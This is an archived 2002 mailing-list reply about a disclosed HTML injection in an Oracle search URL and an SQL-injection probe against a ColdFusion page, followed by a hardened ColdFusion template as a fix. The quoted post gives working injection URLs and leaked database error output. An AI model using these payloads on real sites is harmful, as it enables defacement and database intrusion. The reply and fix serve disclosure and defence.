Re: Oracle Databases Allow HTML/SQL injection

From: Jim Kovalchuk (raxorat_private)
Date: Tue Apr 16 2002 - 11:27:43 PDT


    On Tue, 16 Apr 2002, david evlis reign wrote:
    
    > 
    > # oracle database madness"
    > 
    > "I only have a few things to say." - davidr
    > 
    > css in the oracle search engine -->
    > 
    > http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=css><br><br><br><font%20color%20=%20red><h1>DAVID%20REIGN%20IN%20THE%20Y2K+2</H1></b><br><br><br><br><br><br>&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200
    > 
    > i get fucked up error messages from this:
    > 
    > Error generating ctx scoreORA-20000: interMedia Text error: DRG-10800: query 
    > failed: DRG-50921: EQUIV operand not a word or another EQUIV expression
    > 
    > and now, the oracle db, while my hacking was targeted at sql injection i 
    > found this:
    > 
    > Error Diagnostic Information
    > ODBC Error Code = S1000 (General error)
    > [INTERSOLV][ODBC Oracle driver][Oracle]ORA-01756: quoted string not properly 
    > terminated
    > 
    > The error occurred while processing an element with a general identifier of 
    > (CFQUERY), occupying document position (245:5) to (245:130).
    > 
    > Date/Time: Tue Apr 16 17:37:17 2002
    > Browser: Mozilla/4.0 (compatible; MSIE 5.01; Windows 3.1)
    > Remote Address: 64.66.85.22
    > Template: /content/www/prodn/bigpond/direct/view.cfm
    > Query String: ID='54 <-- HAHAH
    > 
    > with the url:
    > 
    > http://dsleerf.net/direct/view.cfm?ID='54
    > 
    > now, why i am laughing:
    > 
    > http://dsleerf.net/bigpond/direct/view.cfm?ID='54"><br><br><br><br><br><br><br><br><br><font%20color%20=%20red><h1>DAVID%20REIGN%20IN%20THE%20Y2K+2</H1></b><br><br><br><br><br><br>
    
    
    This looks like an input validation bug in the Cold Fusion code, as I'm
    quite sure Oracle doesn't use Cold Fusion for their web applications.
    
    Macromedia's drag and drop IDE isn't security aware yet. 
    
    > 
    > the oracle database is shit.
    > anyone who uses oracle is shit.
    > long live apple.
    > 
    > -davidr
    > 
    > 
    > 
    > 
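
The input validation the reply refers to, sketched as a hardened ColdFusion template. This is an added example, not code from the thread or from the affected site. The datasource `exampleDSN`, the table `example_items`, its columns and the log file name are hypothetical.

```cfml
<!--- Added example: hardened sketch of a view.cfm-style template.
      Datasource, table, column and log file names are hypothetical. --->

<!--- 1. Validate: the record id must be a short run of digits, nothing else. --->
<cfparam name="URL.ID" default="">
<cfif NOT REFind("^[0-9]{1,9}$", URL.ID)>
    <cfheader statuscode="400" statustext="Bad Request">
    <cfoutput>Invalid record id.</cfoutput>
    <cfabort>
</cfif>

<!--- 2. Bind: cfqueryparam passes the value as a typed bind variable,
         so it never becomes part of the SQL text. --->
<cftry>
    <cfquery name="getItem" datasource="exampleDSN">
        SELECT title, body
        FROM   example_items
        WHERE  item_id = <cfqueryparam value="#URL.ID#" cfsqltype="CF_SQL_INTEGER">
    </cfquery>
    <cfcatch type="database">
        <!--- 3. Fail closed: keep the driver message in a server-side log and
                 send a generic page, not the ORA-/ODBC text, template path
                 and query string that the default error page exposes. --->
        <cflog file="view_errors" type="error" text="#cfcatch.message#">
        <cfheader statuscode="500" statustext="Internal Server Error">
        <cfoutput>The request could not be processed.</cfoutput>
        <cfabort>
    </cfcatch>
</cftry>

<!--- 4. Encode: every value written into the page goes through HTMLEditFormat,
         so markup in stored or requested data is shown as text. --->
<cfoutput query="getItem">
    <h1>#HTMLEditFormat(getItem.title)#</h1>
    <p>#HTMLEditFormat(getItem.body)#</p>
</cfoutput>
<cfif getItem.RecordCount EQ 0>
    <cfoutput>No record found for id #HTMLEditFormat(URL.ID)#.</cfoutput>
</cfif>
```

With this in place a request such as `ID='54` is rejected at step 1 with a 400 response and never reaches the CFQUERY element.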
    



    This archive was generated by hypermail 2b30 : Tue Apr 16 2002 - 13:12:45 PDT